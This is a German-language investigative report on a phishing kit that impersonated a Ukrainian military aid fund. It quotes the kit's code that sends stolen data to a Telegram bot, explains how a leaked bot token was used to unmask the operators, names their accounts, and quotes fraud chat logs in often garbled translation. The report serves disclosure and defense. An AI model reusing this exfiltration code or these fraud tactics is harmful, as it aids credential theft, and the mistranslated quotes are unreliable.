Zurück zu den Nachrichten
Aktive Bedrohung – Untersuchungsbericht

Phishing-Netzwerk im Bereich der Militärhilfe aufgedeckt: 5 Banken ins Visier genommen, Betreiber identifiziert

Die automatisierte Pipeline von PhishDestroy hat eine Phishing-Aktion, bei der sich die Täter als ukrainische Militärhilfsstiftung ausgaben, innerhalb weniger Minuten vollständig aufgeschlüsselt – von der Domain-Registrierung bis zur Identifizierung der Betreiber.

25. März 2026 PhishDestroy-Forschung 12 Minuten Lesezeit
Screenshot 1 – Überblick über die Untersuchung: Das Phishing-Netzwerk „dopomogvoina[.]sbs“ zielt auf ukrainische Militärveteranen ab.
5
Banken im Visier
3
Betreiber identifiziert
6
API-Aufrufe zum Aufheben der Maskierung
2
Parallele Phishing-Projekte
<30
In wenigen Minuten zur vollständigen Analyse
Offenlegung von Sponsoren(Zum Erweitern bitte anklicken)
Wir stellen den offiziellen Sponsor dieser Untersuchung vor
🏆 NICENIC International Group Co., Limited 🏆
Die meisten maßgebend Registrar, der arbeitet mit Netcraft zusammen (indem sie das System austricksen) · Offizieller Domain-Anbieter für die Kraken-Drogenmarktplatz · Anbieter von Mengenrabatten · Engagierter Anhänger der „Der typische Betrüger“ VK-Community – hat aber immer noch keinen Anonymitätskurs gekauft
⭐ 1,8
Trustpilot
Bewertung
200 Dollar
.ru-Preis
120 Rubel (real)
0
Meldungen von Missbrauch
umgesetzt
15.000 %
Domain
Markup
  • Obwohl er angibt, „Chinese“ (Hongkong) zu sein, stammt der Urheber aus Gorlovka, Volksrepublik Donezk. Das chinesische Logo dient rein dekorativen Zwecken – genau wie ihre Nutzungsbedingungen
  • Wartet Unterstützung für die russische Sprache über VKontakte und Telegram, verkauft .ru für 200 Dollar, während reg.ru 120 Rubel (~1,30 $)
  • Negative Trustpilot-Bewertungen, in denen Domains für Drogenmarktplätze auf mysteriöse Weise verschwinden. Zufall? Keineswegs
  • Ein aktiver Abonnent von „Der typische Betrüger“ (Typischer Betrüger) VK-Community – wenn dein Registrar Betrügergruppen folgt, weißt du, wer ihre Zielgruppe ist
  • arbeitet zusammen mit Netcraft gerade so viel, dass eine Löschung vermieden wird, während die Infrastruktur für Phishing-, Glücksspiel- und Drogen-Domains aufrechterhalten bleibt

Unterdessen bei „Der typische Betrüger“:

Original (Russisch)
Übersetzt (Englisch)
Ein Versprechen an unseren Sponsor: Wenn dieser Beitrag von „Типичный Мошенник“ Wirklichkeit wird – und nach dem, was wir wissen, ist es nur eine Frage der Zeit, bis wenn, nicht if — Unser gesamtes Team wird sich bei VKontakte anmelden und der Community beitreten. Betrachten Sie das als unseren herzlichen Applaus. 👏

* Dies ist eine Satire. NiceNIC hat diese Untersuchung nicht gesponsert. Das Unternehmen hat sie jedoch notwendig gemacht, indem es sich über mehr als fünf Tage hinweg weigerte, auf unsere Missbrauchsmeldungen zu reagieren. Alle oben genannten Angaben basieren auf öffentlich zugänglichen Informationen und unseren praktischen Erfahrungen. Lesen Sie unseren vollständigen Bericht über NiceNIC →

Was PhishDestroy entdeckt hat

Am 20. März 2026 meldete die automatisierte Pipeline zur Erkennung von Bedrohungen von PhishDestroy dopomogvoina[.]sbs — eine frisch registrierte Domain, auf der eine Phishing-Seite gehostet wird, die sich als „Der Schild des Verteidigers“ („Shield of the Defender“), eine vorgetäuschte Stiftung für militärische Hilfe in der Ukraine. Die Website richtet sich an ukrainische Militärveteranen, Kriegsversehrte und die Familien von gefallenen Soldaten und verspricht staatliche Finanzhilfen, während sie gleichzeitig die Zugangsdaten für fünf der größten Banken der Ukraine stiehlt.

Im Folgenden finden Sie eine vollständige Aufschlüsselung aller Erkenntnisse unserer automatisierten Analyse: das Social Engineering, die technische Infrastruktur, das Echtzeit-Steuerungssystem sowie die Identitäten der Personen, die das System betreiben.

Folgenabschätzung
Die Website richtet sich speziell an die am stärksten gefährdeten Personen: Kriegsveteranen mit PTBS, Familienangehörige von im Einsatz gefallenen Soldaten, die staatliche Unterstützung beantragen, sowie verwundete Soldaten, die sich in komplexen bürokratischen Systemen zurechtfinden müssen. Jeder gestohlene Zugangsdatensatz kann innerhalb weniger Minuten zur vollständigen Übernahme des Kontos führen.

Abschnitt 1: Der Köder – Die vorgetäuschte Militärhilfegesellschaft

Die Domain dopomogvoina[.]sbs wurde am 20. März 2026 über NICENIC International Group Co., Ltd., ein Registrar, der bekanntermaßen nur langsam oder gar nicht auf Missbrauchsfälle reagiert. Der .sbs TLD (Side-By-Side) ist eine kostengünstige gTLD, die häufig für kurzlebige Phishing-Infrastrukturen genutzt wird.

Die Website präsentiert sich als professionelles, regierungsnahes Hilfsportal. Eine ukrainische Flagge ziert die Kopfzeile, militärische Bilder verleihen ihr Authentizität, und der Text ist sorgfältig in ukrainischer Sprache verfasst, wobei die behördliche Ausdrucksweise an seriöse Regierungsprogramme erinnert.

dopomogvoina phishing site homepage showing fake military aid foundation
Screenshot 5 – Die Startseite der Phishing-Website, die sich als „Щит Захисника“ (Schild des Verteidigers) ausgibt.

Um Glaubwürdigkeit zu schaffen, fälschten die Betreiber einen Statistikzähler, der gut sichtbar auf der Startseite angezeigt wurde:

  • 2.847 Bewerbungen — was bedeutet, dass bereits Tausende Hilfe erhalten haben
  • 47,2 Mio. ₴ ausgeschüttet — eine hohe, aber glaubwürdige Zahl in UAH
  • 19 Programme — was auf eine umfassende, mehrere Programme umfassende Maßnahme hindeutet

Diese Zahlen sind reine Erfindungen, die fest in den Quellcode der Seite eingebettet sind und keinerlei Verbindung zum Backend haben. Sie dienen einem einzigen Zweck: als sozialer Beweis, um die Zurückhaltung des Opfers zu überwinden.

Abschnitt 2: Die Falle – 5 Banken, ein Ziel

Nach dem Klicken auf „Подати заявку“ (Antrag einreichen) wird dem Opfer ein Bildschirm zur Auswahl einer Bank angezeigt. Als Optionen werden fünf der größten Privatkundenbanken der Ukraine angezeigt, jeweils mit ihrem offiziellen Markenauftritt und Logo. An dieser Stelle wechselt das Social Engineering von emotionaler Manipulation zu technischem Diebstahl.

Bank selection screen showing 5 Ukrainian banks
Screenshot 6 – Bildschirm zur Bankauswahl. Jede Option führt zu einer individuellen Abfolge von Anmelde- und Passwortdiebstählen.

Die Analyse des JavaScript-Bundles der Website ergab, dass jede Bank ein einzigartige mehrstufige Abfolge zum Ausspähen von Zugangsdaten, das genau auf den tatsächlichen Authentifizierungsablauf dieser Bank zugeschnitten ist:

PrivatBank

AnmeldenPasswortPersönliche IdentifikationsnummerSMS

ein einziges Bankkonto

AnmeldenPersönliche IdentifikationsnummerSMSE-Mail

Oschadbank

AnmeldenÜberprüfenSMS

PUMB

AnmeldenSMS

Ukrsibbank

AnmeldenPersönliche IdentifikationsnummerSMS

Der Ablauf des Angriffs ist bei jeder Bank derselbe:

Gefälschte Spendenseite
Auswahl der Bank
Anmeldung klonen
2FA-Abfang
Kontoübernahme
Fake PrivatBank login page
Screenshot 7 – Nachgebildete Anmeldeseite der PrivatBank.
Fake PUMB login page
Screenshot 9 – Geklonte PUMB-Anmeldung.
Attack flow diagram showing phishing stages from fake aid page to account takeover
Screenshot 10 – Der gesamte Angriffsablauf: von der gefälschten Seite für Militärhilfe über die Bankauswahl bis hin zum Diebstahl von Zugangsdaten und der Übernahme des Kontos.

Der Tech-Stack: React-SPA Frontend bereitgestellt über Cloudflare CDN, mit einem Express.js Backend zur Exfiltration von Anmeldedaten. Die React-Architektur ermöglicht nahtlose, mehrstufige Formulare, die sich kaum von echten Bankoberflächen unterscheiden lassen.

Abschnitt 3: Echtzeit-Bedienersteuerung

Es handelt sich hierbei nicht um einen einfachen Credential-Harvester mit einer statischen Datenbank. Das Phishing-Kit umfasst einen Live-WebSocket-Kontrollfeld die es einem menschlichen Bediener ermöglicht, jede Opfersitzung in Echtzeit zu steuern.

Der WebSocket-Endpunkt unter wss://dopomogvoina[.]sbs/ws unterstützt die folgenden Nachrichtentypen:

register          — New victim session created
update_user_data  — Stolen credentials transmitted to operator
next_step         — Operator advances victim to next theft stage
create_application — Victim starts "aid application"
answer_question   — Operator sends custom prompt to victim

Dank dieser Echtzeitsteuerung kann der Bediener:

  • Einen Wartezustand erzwingen — die Meldung „Ihre Anfrage wird bearbeitet...“ anzeigen, während sie sich in das echte Bankkonto des Opfers einloggen
  • Zu einem bestimmten Schritt weiterleiten — einen neuen SMS-Code anfordern, falls der erste abgelaufen ist
  • Falsche Fehlermeldungen anzeigen — „Ungültiger Code, bitte erneut eingeben“, um mehrere 2FA-Token zu sammeln
  • Individuelle Fragen stellen — während der Sitzung nach dem Geburtsdatum, der Kartennummer oder weiteren Daten fragen
Was macht das gefährlich?
Die Echtzeit-Steuerung durch den Angreifer umgeht zeitbasierte 2FA-Sicherheitsmaßnahmen. Der Angreifer fängt den SMS-Code ab und nutzt ihn innerhalb seines Gültigkeitszeitraums – in der Regel 30 bis 120 Sekunden –, während das Opfer auf eine gefälschte „Verarbeitungs“-Animation starrt.
Phone number entry form on fake bank login
Screenshot 8 – Formular zur Eingabe der Telefonnummer, das zum Diebstahl von Zugangsdaten genutzt wird.
WebSocket-based operator control panel
Screenshot 11 – Das Echtzeit-Bot-Panel des Betreibers zur Steuerung der Opfer-Sitzungen.

Der gesamte Umfang der pro Sitzung gestohlenen Daten: phone, password, PIN, SMS code, card number, date of birthund email.

Abschnitt 4: Hinter den Kulissen von Cloudflare – Zwei Projekte, ein Server

Das Cloudflare-Proxying verbirgt den Ursprungsserver, doch die Infrastruktur-Analysepipeline von PhishDestroy hat die tatsächliche Ursprungs-IP ermittelt: 45.131.214[.]148, gehostet bei RapidSeedbox / LeaseWeb in den Niederlanden.

Ein entscheidendes Detail: dopomogvoina[.]sbs wird über Cloudflare, wobei die IP-Adresse des Absenders verborgen bleibt. Unser System verfolgt jedoch auch hlpforvpeople[.]sbs — eine verwandte Domain, die über denselben NICENIC-Registrar registriert wurde und übereinstimmende Muster aufweist. Diese Domain lautet NICHT hinter Cloudflare, wodurch die IP-Adresse des Absenders direkt offengelegt wird: 45.131.214[.]148.

Eine direkte Verbindung zu dieser IP-Adresse herstellen – ohne einen Host Kopfzeile – enthüllte etwas Unerwartetes: ein eine völlig andere Phishing-Seite. Anstelle der militärischen Hilfe für die Ukraine wurde der Standard-Vhost bereitgestellt „Gesundheitsausweis“, eine Phishing-Aktion, die sich gegen eine indonesische Krankenkasse richtete. Derselbe Server, völlig andere Opfer, ein völlig anderes Land.

Derselbe Server, dieselben Betreiber, andere Opfer
  • Projekt 1: Militärhilfe für die Ukraine → stiehlt Bankdaten von Veteranen
  • Projekt 2: Indonesische Krankenversicherung → stiehlt Gesundheitsdaten von Bürgern
  • Derselbe Express.js-Stack, dasselbe WebSocket-Echtzeit-Kontrollpanel
  • Dieselbe BT-Panel (宝塔)-Serververwaltungsoberfläche
  • C2-Domäne des zweiten Projekts: rezervtemka[.]cc — ein bekanntes Phishing-Panel, das in der Bedrohungsdatenbank von PhishDestroy identifiziert wurde
  • Kommentare auf Russisch im Quellcode des indonesischen Projekts bestätigen dieselben CIS-basierten Entwickler
Two phishing projects running on the same server — Ukrainian military aid and Indonesian health insurance
Screenshot 12 – Zwei parallele Phishing-Aktionen, die denselben Ursprungsserver nutzen: Militärhilfe für die Ukraine (dopomogvoina) und indonesische Krankenversicherung (HealthCare ID).

Die indonesische Phishing-Vorlage ist eine bekanntes Kit, das in der Bedrohungsdatenbank von PhishDestroy erfasst ist. Wir haben festgestellt, dass Varianten genau dieser Vorlage in ganz Südostasien eingesetzt werden – gezielt gegen indonesische, thailändische und vietnamesische Finanzinstitute. Die Betreiber tauschen lediglich die länderspezifischen Vorlagen aus, während sie dieselbe Backend-Infrastruktur weiterverwenden.

Wahnsinnige Kriminelle
Das ist die Realität moderner Phishing-Angriffe: Den Betreibern ist es egal, wen sie bestehlen. Ukrainische Kriegsveteranen, die um militärische Hilfe bitten, indonesische Arbeiter, die eine Krankenversicherung abschließen wollen – das Ziel wechselt je nachdem, welche Vorlage den größten Gewinn abwirft. Dieselben russischsprachigen Betreiber führen beide Kampagnen gleichzeitig vom selben Server aus durch und wechseln zwischen Opfern in verschiedenen Ländern hin und her, als würden sie einfach nur den Fernsehsender wechseln. Heute sind es ukrainische Banken. Morgen könnten es israelische Banken sein – wie Bonya bereits im März 2026 angefragt hat.

Abschnitt 5: Die config.json, die alles offenlegte

So hat eine einzige falsch konfigurierte Datei den gesamten Betrieb lahmgelegt – Schritt für Schritt.

Nachdem das zweite Projekt des Ursprungsservers identifiziert worden war, hat PhishDestroy JS Analyzer — unser automatisiertes Tool zur Analyse von JavaScript — wurde auf das Paket der indonesischen Phishing-Website unter https://45.131.214[.]148/assets/index-ZMQxHb_h.js. Der Analysator extrahierte alle API-Endpunkte, externen URLs und Konfigurationspfade aus der 335 KB großen JavaScript-Datei. Zu den Ergebnissen gehören:

  • Fünf API-Endpunkte unter rezervtemka[.]cc — das C2-Panel zur Überprüfung von Zugangsdaten
  • Eine WebSocket-Verbindung zu wss://rezervtemka[.]cc
  • Integration des Facebook-Pixels zur Nachverfolgung von Opfern
  • Ein Verweis auf /config.json — wird zur Laufzeit für die Konfiguration des Telegram-Bots geladen

Diesem Hinweis folgend haben wir /config.json von der Ursprungs-IP. Die Datei war ohne jegliche Authentifizierung zugänglich – sie befand sich im Webroot und war für jeden lesbar:

async function loadConfig() {
  const response = await fetch('/config.json');
  // ...
}
async function sendNotification() {
  const cfg = await loadConfig();
  await fetch(`https://api.telegram.org/bot${cfg.bot_token}/sendMessage`, {
    method: 'POST',
    body: JSON.stringify({ chat_id: cfg.chat_id, text: message })
  });
}

Die /config.json Die Datei war direkt von der Ursprungs-IP aus zugänglich — Keine Authentifizierung, keine Zugriffskontrolle, nur eine einfache JSON-Datei im Web-Stammverzeichnis:

{
  "bot_token": "8724623843:AAFXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX",
  "chat_id": "-100XXXXXXXXXX"
}

Ein Telegram-Bot-Token dient sowohl als Benutzername als auch als Passwort. Wer über das Token verfügt, kann API-Aufrufe als dieser Bot ausführen. Die Betreiber haben ihr Token in einer öffentlich zugänglichen Datei hinterlegt. Sechs API-Aufrufe später hatten wir alles:

getMe — Bot-Identität: „MonettiCRM“ (@MonettiCRM_bot)
Rufe den Chat mit der angegebenen Chat-ID ab. — Gruppenname: „Idr-Karte“ mit einem aktiven Einladungslink
getChatAdministratoren — 3 Administratoren, darunter der Gründer der Gruppe
getChat(creator_id) — Ersteller: @monettiescobar, Telegram Premium, Unternehmensprofil, Zeitzone UTC+3
getChat(admin2_id) — Zweiter Administrator: leeres Profil, vermutlich ein Zweitaccount
getChatMemberCount — Insgesamt 5 Mitglieder in der Betreibergruppe
OSINT chain showing 6 Telegram API calls from config.json to full operator identification
Screenshot 13 – Die gesamte OSINT-Kette: von der offengelegten config.json bis zur vollständigen Identifizierung des Betreibers in 6 API-Aufrufen.

Von einer einzigen falsch konfigurierten Datei bis hin zur vollständigen Identifizierung der Betreiber in sechs HTTP-Anfragen. Keine Exploits, kein unbefugter Zugriff – lediglich Standard-Aufrufe der Telegram-Bot-API unter Verwendung eines Tokens, das die Betreiber selbst offen zugänglich gelassen hatten.

Abschnitt 6: Die Betreiber

Ein Hinweis zur kriminellen Kreativität

Was nun folgt, ist ein Paradebeispiel für völlig unpassende Alias-Namen. Wir haben MONETTI ESCOBAR — denn nichts strahlt so sehr „Unauffälligkeit“ aus, wie sich nach dem berühmtesten Drogenbaron der Geschichte zu benennen. Und dann gibt es noch Mach mal langsam, auch bekannt als Vater des Gesetzes (wörtlich „Papa-Dieb-von-Recht-und-Gesetz“ – ein Anspielung auf die russische kriminelle Hierarchie), Gutund Bubullikk. Und schließlich Devoys, dessen Benutzername @devosus Das klingt verdächtig nach „dev ops us“ – ein Entwickler, der seine Berufsbezeichnung in seinen Benutzernamen aufgenommen hat. Das sind die Leute, die dachten, sie könnten automatisierte Bedrohungsanalysen überlisten. Spoiler: Das konnten sie nicht.

Telegram operator group 'Idr card' exposed via bot token
Screenshot 14 – Die Telegram-Operatorgruppe „Idr card“, die durch das durchgesickerte Bot-Token aufgedeckt wurde.
MONETTI ESCOBAR Telegram avatar
Inhaber / Gründer
MONETTI ESCOBAR
@monettiescobar
Telegram-ID: 8135223234
Telegram Premium, Unternehmensprofil
Zeitzone: UTC+3 (GUS-Region)
10 öffentliche Nachrichten – strenge OPSEC
TraFFeeQ-ChatMedusa Google AdsDeepfakes-Kanal
Bonya Telegram avatar
Dispositionskraft / Verkehrsleitung
Mach mal langsam
Guten Morgen
Telegram-ID: 6242202706
Auch bekannt als: PapaZakonVor, Boa, bubullikk
261 Beiträge in 12 Gruppen
DC2 – Amsterdam, NL
CryptoGrabSTYX-MarktStufe CCEMPIRE CHATPhoenix-Lösung
Entwickler / Programmierer
Devoys
@devosus
Telegram-ID: 8213612730
Entwickler von Phishing-Kits – Betreiber bezeichnen ihn als Programmierer
Aufgefordert, „über die Verteidigung nachzudenken“, wenn eine Sicherheitslücke entdeckt wird
Von vornherein auf einen minimalen Platzbedarf ausgelegt
Einkaufen @devosus ≈ „dev ops us“ – Berufsbezeichnung als Benutzername
Entwickler von BausätzenInfrastrukturSicherheit

MONETTI ESCOBAR – Der Boss

MONETTI achtet streng auf die Sicherheit im Betrieb – nur 10 öffentliche Nachrichten auf zwei Gruppen verteilt. Aber die Gruppen sprechen für sich: TraFFeeQ-Chat (Traffic-Arbitrage zu betrügerischen Zwecken), Medusa Google Ads (Black-Hat-Google-Ads) sowie ein Deepfakes-Kanal. In seinem Telegram-Unternehmensprofil steht „Есть предложение“ („Ich habe einen Vorschlag“) – offene Werbung für Dienstleistungen. Die Zeitzone UTC+3 (entspricht Moskau/Minsk/Kiew) und die Geschäftszeiten rund um die Uhr bestätigen, dass es sich um einen rund um die Uhr aktiven Betrieb mit Sitz in der GUS handelt.

Bonya – Der Unachtsame

Im Gegensatz zu MONETTIs sorgfältiger OPSEC ist Bonya (früheres Pseudonym: Vater des Gesetzes — sinngemäß „DaddyThiefByLaw“) hinterließ eine riesige digitale Spur — 261 Nachrichten in 12 Untergrundgruppen. Sein Chatverlauf liest sich wie ein krimineller Lebenslauf:

Bonya in eigenen Worten (aus dem Russischen übersetzt)
  • „Wetten mit einer Quote unter 2,0“„Nur Phishing für [Banksicherheit] 2.0“ — Erörterung der Kompatibilität von Phishing-Kits mit neueren Sicherheitssystemen von Banken
  • „Gute Drops sind schwer zu finden“„Gute Geldkuriere sind schwer zu finden“ — Komplizen für Geldabhebungen suchen
  • „Komm doch zu mir ins Kulturzentrum und arbeite dort“„Komm und arbeite in meinem Callcenter“ — Personalvermittlung für Betreiber
  • „Gibt es hier jemanden, der schon einmal mit israelischen Banken zusammengearbeitet hat?“„Ist hier jemand, der schon einmal mit israelischen Banken zusammengearbeitet hat?“ — Ausweitung auf neue Zielgruppen (März 2026)
  • „Ich sehe nicht wirklich viele Logos auf der Finke“„Ich sehe nicht viele Finanzprotokolle“ — über die Qualität gestohlener Zugangsdaten
  • „Wenn 1 Proxy 1–2 Ampere Strom verbraucht“„Ein Bevollmächtigter für nur 1–2 Banken“ — Diskussion über die operative Sicherheit im Zusammenhang mit Bankbetrug
  • „Der Geldautomat hat ihre Karte eingezogen“„Ihre Karte ist im Geldautomaten hängen geblieben“ — Ein Geldkurier stahl ihnen 60.000 ₴ und behauptete, der Geldautomat habe die Karte verschluckt. Selbst Kriminelle werden von ihren eigenen Komplizen betrogen.

Seine Mitgliedschaften in verschiedenen Gruppen vermitteln ein umfassendes Bild: CryptoGrab (Krypto-Wallet-Leerzieher), STYX-Markt (Untergrundmarktplatz für gestohlene Daten), CC-Prüfprogramm (Tools zur Kreditkartenüberprüfung), EMPIRE CHAT und Phoenix-Lösung (Koordination von Betrugsdelikten). Es handelt sich hier nicht um einen Einmaltäter – sondern um jemanden, der fest im Ökosystem der Cyberkriminalität verankert ist.

Devoys – Der Entwickler

Das technische Rückgrat der Operation. Von vornherein auf minimale öffentliche Präsenz ausgelegt – als die Gruppe angegriffen wurde, wandte sich Bonya ausdrücklich an ihn: „@devosus, denk mal über die Verteidigung nach, bevor uns jemand den Arsch aufreißt“„@devosus, denk mal an die Verteidigung, bevor wir ordentlich eins auf die Mütze bekommen.“ Seine sarkastische Reaktion auf den Vorfall — „wenn bei Interpol“ („Wann sollte man interpolieren?“) – lässt vermuten, dass dies nicht ihr erster Beinaheunfall ist.

Verhaltensanalyse: 261 Nachrichten entschlüsselt

Die OSINT-Pipeline von PhishDestroy hat Daten gesammelt und übersetzt alle 261 öffentlichen Nachrichten von Bonya aus über 12 unterirdische Telegram-Gruppen (Juni 2024 – März 2026). Maschinelle Übersetzung über die DeepL-API mit manueller Korrektur im Kontext. Die Nachrichten geben Aufschluss über ein vollständiges operatives Profil – nach Art der kriminellen Aktivitäten unten kategorisiert.

Nachrichtenverteilung: 261 Nachrichten in 12 Gruppen
  • 💬ONE|Chat — 91 Nachrichten (Koordination bei Betrugsfällen)
  • Aktuelles/Überprüfungen — 37 Nachrichten (Betrugsversuche unter dem Vorwand der Verifizierung)
  • Rolex | Allgemeiner Chat — 28 Nachrichten (Carding)
  • EMPIRE CHAT — 24 Nachrichten (Schwarzmarkt)
  • Fbstore — 23 Nachrichten (Traffic-Arbitrage)
  • Facebook-Dokument — 22 Nachrichten (Werbe-Betrug)
  • Phoenix-Lösung — 17 Nachrichten (Bankbetrug)
  • CryptoGrab — 11 Nachrichten (Krypto-Abfluss)
  • STYX-Markt — 2 Nachrichten (Untergrundmarktplatz)
  • CC-Prüfprogramm — 2 Nachrichten (Kartenprüfung)

Bankbetrug und Phishing

💬ONE|ChatMärz 2025
„Hier gibt es nur 2,0 Phish“
Und hier sind die Fische bei 2,0 Ampere
Erörterung der Kompatibilität von Phishing-Kits mit neueren Sicherheitsprotokollen von Banken
💬ONE|ChatMärz 2025
„Alter, hier wird nichts auf Phish verkauft, hier wird mit Phish bezahlt.“
Alter, hier wird nichts auf Chip verkauft, hier muss man mit Bargeld bezahlen
Unterscheidung zwischen Phishing zum Zweck des Verkaufs und Phishing zum Zweck des direkten Diebstahls
Phoenix-LösungAb 2026
„Gibt es hier jemanden, der schon einmal mit Banken in Israel zusammengearbeitet hat?“
Gibt es hier jemanden, der schon einmal mit israelischen Banken zusammengearbeitet hat?
Ausweitung der Geschäftstätigkeit auf den israelischen Bankensektor – 5 Tage vor unserer Untersuchung
Rolex | Allgemeiner ChatSeptember 2024
„Bei nur einem Bevollmächtigten nur 1–2 Banken“
Wenn 1 Proxy 1–2 Stromkreise
Sicherheitsmaßnahmen gegen Betrug bei der Nutzung mehrerer Banken: ein Proxy pro 1–2 Banken, um eine Entdeckung zu vermeiden
Rolex | Allgemeiner ChatSeptember 2024
„Ich sehe nicht viel in den Finanzprotokollen“
Ich sehe nicht wirklich Logos auf der Finke
Kritik an der Qualität gestohlener Bankzugangsdaten auf Schwarzmärkten

Geldkurier & Geldabhebung

💬ONE|ChatMärz 2025
„Gute Drops sind schwer zu finden“
Gute Drops sind schwer zu finden
„Drops“ = Geldkurier, die gestohlene Gelder in Bargeld umtauschen. Klagen über Schwierigkeiten bei der Anwerbung.
💬ONE|ChatMärz 2025
„Komm und arbeite in meinem Callcenter“
Komm doch zu mir ins Kulturzentrum, um dort zu arbeiten
Aktive Anwerbung von Mitarbeitern für einen Callcenter-Betrieb, der Betrugsdelikte begeht
AktuellesJuni 2024
„Uns wurden 60.000 Euro gestohlen“
Uns wurden 60.000 gestohlen
Ein Geldkurier hat den Betrügern selbst 60.000 ₴ gestohlen. Das ist schon eine ironische Wendung.
AktuellesJuni 2024
„Wie zum Teufel konnte der Geldautomat die Karte verschlucken?“
Wie zum Teufel konnte der Geldautomat die Karte einziehen?
Der Mittelsmann behauptete, der Geldautomat habe die Karte „verschluckt“, um an das gestohlene Geld zu kommen. Betrüger, die andere Betrüger betrügen.
AktuellesJuni 2024
„Sie hat es an uns überwiesen, aber dann fehlte uns die Hauptüberweisung, um das Geld weiterzuleiten.“
Sie hat die Zahlung auf uns umgeleitet, aber wir hatten nicht das nötige Guthaben, um das Geld zu überweisen
Beschreibung der Geldauszahlungskette: Opfer → Zwischenkonto → Hauptgeldkurier

Traffic-Betrug und Missbrauch von Anzeigen

EMPIRE CHATAb 2026
„Ich nutze Google nicht, nur Facebook“
Also, ich arbeite nicht mit Google, sondern nur mit Facebook
Spezialisiert auf Facebook-Werbe-Betrug – Leitet Besucher auf Phishing-Seiten weiter
Facebook-DokumentFebruar 2026
„Ohne einen Bürgen würde ich auch keinen Prozentsatz der Werbeausgaben bereitstellen.“
Ich würde auch nicht auf Basis eines Prozentsatzes der Ausgaben ohne Bürgschaft finanzieren
Verhandlung von Zahlungsbedingungen für betrügerische Facebook-Werbekampagnen
CryptoGrabJanuar 2025
„Ich habe AML auf Facebook ausprobiert, um die USA anzusprechen – konnte online aber keine guten Konfigurationen finden“
Ich habe versucht, auf Facebook etwas über Amerika zu posten, habe aber im Internet keine vernünftigen, nicht einmal älteren Links dazu gefunden.
Der Versuch, mithilfe von Facebook-Anzeigen Betrugsmaschen zur Bekämpfung der Geldwäsche zu betreiben, die auf Opfer in den USA abzielen
Psychologisches Profil: Bonya

Der Korpus mit 261 Nachrichten zeigt, dass Cyberkrimineller der mittleren Ebene mit vielfältigen Aktivitäten: Phishing im Bankensektor, Geldkurier-Netzwerke, Facebook-Werbe-Betrug, Abzweigung von Kryptowährungen und Kreditkartenbetrug. Wesentliche Merkmale:

  • Sachliche Nachlässigkeit — 261 Nachrichten in öffentlichen Gruppen, die über ein einziges Konto versendet wurden. Die Verwendung mehrerer Pseudonyme (PapaZakonVor → Boa → Bonya) deutet darauf hin, dass man sich der Bedeutung von OPSEC bewusst war, diese jedoch nicht beachtete
  • Einstellung zur Personalbeschaffung — lädt Menschen aktiv dazu ein, „in meinem Callcenter zu arbeiten“, und verkauft betriebliches Know-how gegen Bezahlung
  • Gleichgültigkeit gegenüber Opfern — behandelt ukrainische, europäische, israelische und amerikanische Ziele mit gleicher Distanz. Die Geografie ist nur eine Variable in der Betrugsgleichung
  • Vertrauensprobleme — wurde von seinem eigenen Geldkurier für 60.000 ₴ betrogen. Das spiegelt auf ironische Weise das Misstrauen wider, das er bei seinen Opfern schürt
  • expansionsorientiert — noch im März 2026 suchte das Unternehmen aktiv nach neuen Bankenmärkten (Israel), was darauf hindeutet, dass das ukrainische Phishing-Projekt nur eine von vielen gleichzeitig laufenden Operationen ist
Bonya: Vollständiges Nachrichtenprotokoll (253 Nachrichten in 12 Gruppen)
Bonya (@BoaCC159) – Vollständiger übersetzter Nachrichtenverlauf
-- Phoenix Solution (16 Beiträge) --
B
Mach mal langsam2026-03-17 14:22
Gibt es hier jemanden, der schon einmal mit Banken in Israel zusammengearbeitet hat?Gibt es hier jemanden, der schon einmal mit israelischen Banken zusammengearbeitet hat?
B
Mach mal langsam2026-03-17 14:22
und arbeitet dabei auch noch leise.Wir arbeiten auch leise
B
Mach mal langsam2026-03-17 14:17
Wie geht's?Wie geht's?
B
Mach mal langsam2026-03-17 14:17
Hallo zusammenHallo zusammen
B
Mach mal langsam2026-03-15 19:02
Nun, jetzt ist so ziemlich alles wieder in Ordnung.Na ja, im Großen und Ganzen ist jetzt alles geregelt
B
Mach mal langsam2026-03-15 19:02
Na ja, das ist schon ein bisschen mühsamNa ja, wir haben ein bisschen Ärger verursacht
B
Mach mal langsam2026-03-15 19:01
Ja, ich hab auch viel im Stillen gearbeitet, es ist echt beschissen.Ja, auch bei der ruhigen Arbeit habe ich es echt satt
B
Mach mal langsam2026-03-15 19:00
Wie war dein freier Tag?Wie war dein Wochenende?
B
Mach mal langsam2026-03-15 19:00
Ihr alle.An alle
B
Mach mal langsam2026-03-14 14:29
Er ist nicht mehr ganz so anonym, da nun alle wissen, dass es Marik ist.So anonym ist er gar nicht mehr, da ja alle wissen, wer Marik ist
B
Mach mal langsam2026-03-14 14:24
WiedergeborenWiedergeboren
B
Mach mal langsam2026-03-14 14:24
Ahahahahahahahahahahahahahahahahahahahahahahah.Ahahahahahahahahahaha
B
Mach mal langsam2026-03-14 14:23
Ich war traurig, als ich sah, dass der Chatraum verschwunden war.Ich war richtig enttäuscht, als ich sah, dass der Chat verschwunden war
B
Mach mal langsam2026-03-14 14:22
Ich dachte schon, ich würde dich nie finden.Ich dachte schon, ich würde euch nicht mehr finden
B
Mach mal langsam2026-03-14 14:22
MeinКу
B
Mach mal langsam2026-03-14 14:22
ScheißeScheiße
-- 👨‍⚕️ FB-DOC – Chat zum Thema Traffic-Arbitrage (21 Nachrichten) --
B
Mach mal langsam2026-03-15 07:23
@fbdoc21@fbdoc21
B
Mach mal langsam2026-03-15 07:20
Schlag dir mit deinem Schwanz gegen die Stirn.Ich schlag mir mit dem Schwanz auf die Stirn
B
Mach mal langsam2026-03-06 15:18
So etwa fünf auf dem 2,5-Zoll-Bildschirm😂.Wie die Fünf auf dem Screenshot 2,5😂
B
Mach mal langsam2026-02-19 17:05
an euch alle.An euch alle
B
Mach mal langsam2026-02-19 17:04
Wenn du einen Deal abschließt, werde ich lachen.Wenn du den Handel eröffnest, werde ich lachen
B
Mach mal langsam2026-02-19 17:04
kontinental?Continental?
B
Mach mal langsam2026-02-19 17:04
Da ist sie also.Da, sie ist einverstanden
B
Mach mal langsam2026-02-19 17:01
Prüfen Sie daher immer die Bonität, wenn Sie nach einem Bürgen fragen.Also, fragen Sie immer nach dem Garantiegeber
B
Mach mal langsam2026-02-19 17:00
Er fragte nach einem Bürgen und verschwand sofort.Kaum hatte er nach dem Bürgen gefragt, war er auch schon verschwunden
B
Mach mal langsam2026-02-19 17:00
Das ist Carina.Ach, Karina
B
Mach mal langsam2026-02-19 16:59
Du suchst also einen Bürgen?Na, gehst du zum Garant?
B
